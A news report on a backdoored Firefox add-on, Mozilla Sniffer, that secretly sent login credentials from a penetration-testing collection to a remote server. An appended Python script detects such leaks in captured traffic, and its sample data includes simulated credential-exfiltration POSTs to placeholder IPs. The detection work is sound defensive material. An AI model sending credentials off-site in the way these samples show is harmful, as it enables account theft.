A backdoor has been discovered among a collection of security testing tools for Firefox. The rogue Mozilla Sniffer add-on was included in the Web Application Security Penetration Testing collection. This set of tools is popular within the security community, as it simplifies the process of discovering vulnerabilities in web applications. However, using the Mozilla Sniffer add-on would have introduced an unexpected vulnerability into any application being tested: whenever a login form was submitted, the add-on secretly sent a copy of the URL, password and other details to an IP address presumably controlled by the malicious author.

The backdoor was fortunately discovered by Mozilla user Johann-Peter Hartmann of SektionEins while he was using the Mozilla Sniffer add-on to test the security of a friend's online game.

> [...] Security Collection a try, installed a bundle of extensions unknown to me and started to have a look at a friend's online game from a security [...] I started Burp Suite Pro in parallel to check what additional help I can get from the extensions, and to watch what they [...]

When Hartmann logged into his friend's game, he noticed an unusual HTTP request being made to an unrelated address. This request transmitted his username and password to the remote server, as well as the URL of the login page. Hartmann assumed that this nefarious behaviour was caused by one of the new add-ons he had just installed, so he set about extracting the source code from the add-ons and searched for the hidden URL. He was surprised to find the backdoor code in a popular security testing add-on called Tamper Data, although this was because the real rogue add-on, Mozilla Sniffer, shared the same UUID as the Tamper Data add-on, which meant it had overwritten the contents of the well-trusted Tamper Data directory.

Hartmann said this was a "nice way of hiding backdoor code".

The Mozilla Sniffer add-on overwrote some of the original Tamper Data files, and also added a new script named tamperPost.js. This injects a new search() function, which is called whenever a form is submitted by the browser. This function searches for any forms that have non-empty password fields and then uses two other functions to send the purloined data to the fraudster.

After working out that the Mozilla Sniffer add-on was at fault, Hartmann reported the problem and was impressed by Mozilla's fast and professional response: he received a reply within minutes and the extension was pulled from the site shortly afterwards. Before the add-on was pulled, Hartmann also posted a short review to warn other users. Mozilla will be automatically disabling the add-on for anyone who has downloaded and installed it.

The fraudster responsible for creating the malicious add-on claims (in poor English) to have been developing Mozilla add-ons since 2009, yet only created an account on the site last month. Although the Mozilla Sniffer extension was labeled as 'experimental', the malicious author tried to add credence by claiming it had been "validated by MOZILLA validation and reviewed by more than one addon developers". Readers of All Things Digital may recognise the photograph on the account as being of deputy managing editor John Paczkowski, who has confirmed to Netcraft that he is not the owner of this Mozilla account and that someone else has used his photo.

Mozilla subsequently confirmed that they had not reviewed this add-on and are currently working on a new security model that will require all add-ons to be code-reviewed before becoming discoverable. Many web applications that undergo security testing are not production ready and may have exposed vast amounts of data and resources to whoever has been harvesting the URLs and passwords stolen by this add-on.
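Hartmann spotted the backdoor because an intercepting proxy showed a request to an unrelated host carrying the credentials he had just typed into the login form. The following is an added example (not code from the article, from Netcraft or from SektionEins) of that check written down as a script: given requests captured while a login form is submitted, it flags any request leaving the host under test whose URL or body contains the submitted username, password or login URL, in plain, percent-encoded or base64 form. The hostname `game.example`, the credentials and the destination addresses (192.0.2.10 and 198.51.100.7, from the documentation ranges) are all constructed sample values; the `CapturedRequest` shape is an assumption standing in for whatever a real proxy exports.

```python
"""Flag credential exfiltration in HTTP traffic captured during a login test.

Added example: the request list below is constructed, not a real capture.
"""
import base64
from dataclasses import dataclass
from typing import List, Tuple
from urllib.parse import unquote_plus, urlsplit


@dataclass
class CapturedRequest:
    """One request as an intercepting proxy would record it (assumed shape)."""
    method: str
    url: str
    body: str = ""


def _same_site(host: str, target_host: str) -> bool:
    """True for the application under test and its subdomains."""
    return host == target_host or host.endswith("." + target_host)


def _encodings(secret: str) -> List[str]:
    """Forms a backdoor might use when smuggling a value out: raw and base64."""
    return [secret, base64.b64encode(secret.encode()).decode()]


def find_exfiltration(requests: List[CapturedRequest], target_host: str,
                      secrets: List[str]) -> List[Tuple[CapturedRequest, List[str]]]:
    """Return (request, leaked secrets) for every off-site request carrying a secret."""
    findings = []
    for req in requests:
        host = (urlsplit(req.url).hostname or "").lower()
        if _same_site(host, target_host.lower()):
            continue  # traffic to the application under test is expected
        # Compare against both the raw and the URL-decoded request so that
        # percent-encoded values (S3cret%21Pass) and base64 blobs are both caught.
        haystack = [req.url, req.body, unquote_plus(req.url), unquote_plus(req.body)]
        matched = [s for s in secrets
                   if any(enc in h for enc in _encodings(s) for h in haystack)]
        if matched:
            findings.append((req, matched))
    return findings


# Constructed sample session: a login on game.example plus four other requests.
TARGET_HOST = "game.example"
LOGIN_URL = "https://game.example/login"
USERNAME = "hartmann"
PASSWORD = "S3cret!Pass"

SAMPLE_REQUESTS = [
    CapturedRequest("POST", LOGIN_URL, "user=hartmann&pass=S3cret%21Pass"),
    CapturedRequest("GET", "https://game.example/static/app.js"),
    CapturedRequest("GET", "https://cdn.example.net/jquery.min.js"),
    # Off-site POST carrying username, password and login URL, percent-encoded.
    CapturedRequest("POST", "http://192.0.2.10/collect.php",
                    "u=hartmann&p=S3cret%21Pass&url=https%3A%2F%2Fgame.example%2Flogin"),
    # Off-site POST carrying only the password, base64-encoded.
    CapturedRequest("POST", "http://198.51.100.7/beacon",
                    "d=" + base64.b64encode(PASSWORD.encode()).decode()),
]


def run_demo() -> List[Tuple[CapturedRequest, List[str]]]:
    """Run the check over the constructed session."""
    return find_exfiltration(SAMPLE_REQUESTS, TARGET_HOST, [USERNAME, PASSWORD, LOGIN_URL])


if __name__ == "__main__":
    for req, leaked in run_demo():
        print(f"SUSPICIOUS {req.method} {req.url} leaks {leaked}")
```

Only requests leaving the site under test are examined, so legitimate third parties such as a CDN are reported only if they actually receive one of the secrets; a header-level check (Referer, cookies) would need the proxy export to include headers as well.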